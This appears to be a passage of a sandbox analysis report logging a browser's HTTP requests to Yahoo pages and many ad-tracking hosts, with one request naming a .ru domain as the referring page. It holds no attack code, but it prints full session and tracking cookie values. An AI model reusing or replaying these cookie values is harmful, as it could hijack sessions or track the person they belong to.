Source: global trafficHTTP traffic detected: GET /_td_api/beacon/performance?ybar-init_0=0.40000000002328306&ybar-mod-sidenav_0=2&ybar-mod-logo_0=0.20000000001164153&ybar-mod-searchbox_0=0.5&ybar-mod-assistjs_0=3.1000000000058208&ybar-mod-adaptivenav_0=0.1999999999825377&ybar-account-init_0=0.7999999999883585&ybar-mail-init_0=1.3999999999941792&ybar-mod-navigation_0=15.10000000000582&ybar-mod-notification_0=0.39999999999417923&ybar-sticky_0=0.20000000001164153&src=ybar&_rdn=870002&apptype=default&rid=1pa4ckpjflnfm&bucket=900%2Cseamless&device=desktop&osName=windows%20nt&browserName=chrome&browserVersion=117.0&site=homepage HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; trc_cookie_storage=taboola%2520global%253Auser-id%3D27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw
Source: global trafficHTTP traffic detected: GET /cv/apiv2/yahoo_weather_web/accuweather-horizontal.png HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /p?c1=2&c2=7241469&c5=2023538075&c7=https%3A%2F%2Fwww.yahoo.com%2F&c14=-1&c8=Yahoo%20%7C%20Mail%2C%20Weather%2C%20Search%2C%20Politics%2C%20News%2C%20Finance%2C%20Sports%20%26%20Videos&c9=https%3A%2F%2Fhfj.rontishet.ru%2F&gdpr=0&gdpr_consent=&cs_ucfr=1&cs_fpdm=*null&cs_fpdt=*null&cs_fpid=ktb74Qf%2BB5a5JQqJGS%2Fbp0PG1iIU%2BWKGDEPE8YdWnT4%3D&cs_fpit=c&ns_c=UTF-8&ns__t=1727716870229 HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /usermatchredir?cb=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dix%26gdpr%3D0%26gdpr_consent%3D%26gpp%3DDBAA%26gpp_sid%3D-1%26f%3Db%26uid%3D&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&s=208386&C=1 HTTP/1.1Host: ssum-sec.casalemedia.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; CMID=ZvreENHM6I4AAAyqADo2kwAA; CMPS=1010; CMPRO=1010
Source: global trafficHTTP traffic detected: GET /libtrc/google-topics-api.20240929-12-RELEASE.es6.js HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /w/1.0/pd?cc=1&gdpr=0&gdpr_consent=&us_privacy=1YNN&ph=2d1251ae-7f3a-47cf-bd2a-2f288854a0ba HTTP/1.1Host: u.openx.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; i=5a760414-e99e-05e0-04c1-b14876f22eba|1727716879
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Select.G4QVlChI.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /sync?us_privacy=1YNN&gpp=DBAA&gpp_sid=-1&&ld=1 HTTP/1.1Host: eb2.3lift.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluidp=3811239664715375770435; tluid=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /getuid?https://ads.yieldmo.com/v000/sync?extinit=0&userid=$UID&pn_id=an HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?sub=yieldmo&redir%3Dhttps%3A%2F%2Fads.yieldmo.com%2Fv000%2Fsync%3Fpn_id%3Dunl%26id%3D%5BRX_UUID%5D HTTP/1.1Host: sync.1rx.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/AccordionItem.COAy-xrR.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /setuid?bidder=ix&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=b&uid=ZvreENHM6I4AAAyqADo2kwAAA_IAAAIB HTTP/1.1Host: pbs.yahoo.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Link.CHR7GGSC.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Switch.BaMlRiYx.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Tabs.agUa80w0.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Tooltip.IRw8ojlh.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/7Z0aKacGGhmhPwsBUl2i5A--~B/Zmk9c3RyaW07aD00MDg7dz03MjA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-09/a129e590-7f30-11ef-8ab3-79e7dd104b7f.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/BdrXtbFtdHZFBGTr4iYGaQ--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2021-01/8fcd9e10-4e8b-11eb-9fdf-5bd1b68e439b.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripts/ifs.js HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cdn.taboola.com/scripts/prebid_iframe_sync.html?gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/1IAUDYdOSONDSm2DkprmEA--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-09/7d21b410-7f40-11ef-b77e-dea3714d1b2e.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
